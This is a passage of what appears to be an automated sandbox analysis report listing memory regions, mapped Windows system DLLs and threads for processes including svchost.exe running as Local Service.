"c:\\windows\\system32\\apisetschema.dll") Region: id = 37209 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37210 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37211 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37212 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 37217 start_va = 0x150000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 37218 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: 
id = 37219 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37220 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37221 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37222 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37223 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37224 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37225 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37226 start_va = 0x260000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 37241 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 37242 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 37243 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffde000" filename = "" Region: id = 37244 start_va = 0x380000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 37245 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37246 start_va = 0xc0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 37247 start_va = 0x430000 end_va = 0x6fefff entry_point = 0x430000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37248 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37249 start_va = 0x75240000 end_va = 0x7524dfff entry_point = 0x75240000 region_type = mapped_file name = "rpcepmap.dll" filename = "\\Windows\\System32\\RpcEpMap.dll" (normalized: "c:\\windows\\system32\\rpcepmap.dll") Region: id = 37250 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37251 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 37252 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37253 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = 
"\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37254 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37255 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37256 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37257 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37258 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37259 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37260 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37261 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37262 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 37263 start_va = 0x753e0000 end_va = 0x753e7fff entry_point = 0x753e0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 37264 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37265 start_va = 0x7b0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename 
= "" Region: id = 37266 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37267 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 37268 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37269 start_va = 0x880000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 37270 start_va = 0x75250000 end_va = 0x752aefff entry_point = 0x75250000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37271 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 37275 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 37276 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37277 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37278 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 37279 start_va = 0xc0000 end_va = 0xfbfff entry_point = 0xc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37280 start_va = 0xc0000 end_va 
= 0xfbfff entry_point = 0xc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37281 start_va = 0xc0000 end_va = 0xfbfff entry_point = 0xc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37282 start_va = 0xc0000 end_va = 0xfbfff entry_point = 0xc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37283 start_va = 0xc0000 end_va = 0xfbfff entry_point = 0xc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37284 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 37285 start_va = 0x77120000 end_va = 0x77154fff entry_point = 0x77120000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 37286 start_va = 0x770f0000 end_va = 0x770f5fff entry_point = 0x770f0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 37287 start_va = 0x75700000 end_va = 0x7573bfff entry_point = 0x75700000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 37288 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37289 start_va = 0x77160000 
end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37290 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37291 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37292 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37293 start_va = 0x8c0000 end_va = 0x987fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 37294 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37295 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37296 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37297 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 37298 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 37299 start_va = 
0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 37300 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 37301 start_va = 0x2c0000 end_va = 0x33ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 37302 start_va = 0x990000 end_va = 0xa90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 37303 start_va = 0xbe0000 end_va = 0xfd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 37304 start_va = 0x75230000 end_va = 0x75234fff entry_point = 0x75230000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 37305 start_va = 0x756f0000 end_va = 0x756f5fff entry_point = 0x756f0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 37306 start_va = 0x75220000 end_va = 0x75225fff entry_point = 0x75220000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 37307 start_va = 0x75210000 end_va = 0x75215fff entry_point = 0x75210000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 37308 start_va = 0x75220000 end_va = 0x75225fff entry_point = 0x75220000 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 37309 start_va = 0x75210000 end_va = 0x75215fff entry_point = 0x75210000 region_type = mapped_file name = 
"wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 37375 start_va = 0x751b0000 end_va = 0x75225fff entry_point = 0x751b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 37376 start_va = 0x751a0000 end_va = 0x751a8fff entry_point = 0x751a0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 38022 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 38023 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38024 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38025 start_va = 0x77a70000 end_va = 0x77afefff entry_point = 0x77a70000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 38026 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 38400 start_va = 0x1010000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 38401 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Thread: id = 1100 os_tid = 0x284 Thread: id = 1103 os_tid = 0x290 Thread: id = 1105 os_tid = 0x298 Thread: id = 1106 
os_tid = 0x29c Thread: id = 1107 os_tid = 0x2a0 Thread: id = 1108 os_tid = 0x2a4 Thread: id = 1109 os_tid = 0x2a8 Thread: id = 1110 os_tid = 0x2ac Thread: id = 1183 os_tid = 0x3e4 Process: id = "672" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1d1160" os_pid = "0x2b0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "667" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ac58" [0xc000000f], "LOCAL" [0x7] Region: id = 37310 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 37311 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 37312 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 37313 start_va = 0xbd0000 end_va = 0xbd7fff entry_point = 0xbd0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 37314 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 37315 start_va = 0x77d40000 
end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 37316 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 37317 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 37318 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 37319 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 37328 start_va = 0x90000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 37329 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 37330 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 37331 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 37332 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 37333 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 37334 start_va = 
0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 37335 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 37336 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 37337 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 37338 start_va = 0x100000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 37339 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 37340 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 37341 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 37342 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 37343 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = 
"\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 37344 start_va = 0x100000 end_va = 0x1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 37345 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 37346 start_va = 0x1f0000 end_va = 0x20cfff entry_point = 0x1f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37347 start_va = 0x1f0000 end_va = 0x20cfff entry_point = 0x1f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37348 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 37349 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 37350 start_va = 0x360000 end_va = 0x460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 37351 start_va = 0x470000 end_va = 0x4effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 37352 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 37353 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 37354 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000001f0000" filename = "" Region: id = 37355 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 37356 start_va = 0x4f0000 end_va = 0x8e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 37357 start_va = 0x8f0000 end_va = 0x94bfff entry_point = 0x8f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37358 start_va = 0x8f0000 end_va = 0x94bfff entry_point = 0x8f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 37359 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 37379 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 37380 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 37381 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 37401 start_va = 0xaa0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 37402 start_va = 0xae0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 37403 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" 
Region: id = 37404 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 37413 start_va = 0x9a0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 37414 start_va = 0xbe0000 end_va = 0xeaefff entry_point = 0xbe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 37415 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 37416 start_va = 0x75090000 end_va = 0x7519bfff entry_point = 0x75090000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 37417 start_va = 0xeb0000 end_va = 0x1007fff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 37418 start_va = 0x210000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 37419 start_va = 0xeb0000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 37420 start_va = 0x1000000 end_va = 0x1007fff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 37423 start_va = 0x1070000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 37424 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 37425 start_va = 0x230000 end_va = 0x230fff entry_point = 0x230000 region_type = mapped_file name = "tzres.dll" filename = 
"\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 37426 start_va = 0x230000 end_va = 0x230fff entry_point = 0x230000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 37427 start_va = 0xb20000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 37428 start_va = 0x758e0000 end_va = 0x75921fff entry_point = 0x758e0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 37429 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 37430 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 37431 start_va = 0x75b30000 end_va = 0x75b37fff entry_point = 0x75b30000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 37432 start_va = 0x75b80000 end_va = 0x75b9afff entry_point = 0x75b80000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 37433 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = 